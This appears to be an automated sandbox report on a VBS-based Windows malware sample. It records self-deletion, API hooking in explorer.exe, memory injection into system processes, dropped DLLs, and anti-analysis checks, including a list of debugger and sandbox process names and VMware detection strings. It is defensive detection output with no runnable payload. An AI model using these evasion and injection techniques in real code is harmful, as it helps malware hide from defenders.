Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6828, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6328, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4604, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY

Deletes itself after installation

Show sources

Source: C:\Windows\System32\wscript.exe

File deleted: c:\users\user\desktop\2q4tlha5wbo1.vbs

Jump to behavior

Hooks registry keys query functions (used to hide registry keys)

Show sources

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Show sources

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Show sources

Source: explorer.exe

EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Show sources

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.673013526.000001CE0FA5A000.00000004.00000001.sdmp	Binary or memory string: FORTITRACER.EXEA

WScript reads language and country specific registry keys (likely country aware script)

Show sources

Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation

Source: C:\Windows\System32\control.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3488
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1819

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.dll	Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\marginal.roq	Jump to dropped file

Source: C:\Windows\System32\wscript.exe TID: 6024	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6460	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6140	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5072	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\Windows\System32\wscript.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local

Source: wscript.exe, 00000000.00000002.684689037.000001CE12A80000.00000002.00000001.sdmp, explorer.exe, 0000001E.00000002.929529321.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.917618198.0000027D4F440000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.916418234.000001B4FA9B0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000001E.00000000.825908202.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000000.834306189.000000000FCE0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWpn
Source: RuntimeBroker.exe, 0000001F.00000000.810750161.0000027D4C640000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000000.825908202.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: RuntimeBroker.exe, 00000020.00000002.912551846.000001B4F862A000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ll
Source: mshta.exe, 00000011.00000003.746769025.00000164FEABF000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Q
Source: explorer.exe, 0000001E.00000000.836872400.000000000FD75000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001E.00000000.817397904.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: wscript.exe, 00000000.00000002.684689037.000001CE12A80000.00000002.00000001.sdmp, explorer.exe, 0000001E.00000002.929529321.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.917618198.0000027D4F440000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.916418234.000001B4FA9B0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000001E.00000000.826085147.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: RuntimeBroker.exe, 0000001F.00000000.812442013.0000027D4E762000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
Source: wscript.exe, 00000000.00000002.684689037.000001CE12A80000.00000002.00000001.sdmp, explorer.exe, 0000001E.00000002.929529321.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.917618198.0000027D4F440000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.916418234.000001B4FA9B0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000001E.00000000.826085147.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: wscript.exe, 00000000.00000002.684689037.000001CE12A80000.00000002.00000001.sdmp, explorer.exe, 0000001E.00000002.929529321.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.917618198.0000027D4F440000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.916418234.000001B4FA9B0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Show sources

Source: C:\Windows\System32\wscript.exe

File created: marginal.roq.0.dr

Jump to dropped file

Allocates memory in foreign processes

Show sources

Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\explorer.exe base: 3100000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\System32\rundll32.exe base: 27FF7160000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B4F85E0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C300000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23FE2C70000 protect: page execute and read and write

Changes memory attributes in foreign processes to executable or writable

Show sources

Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
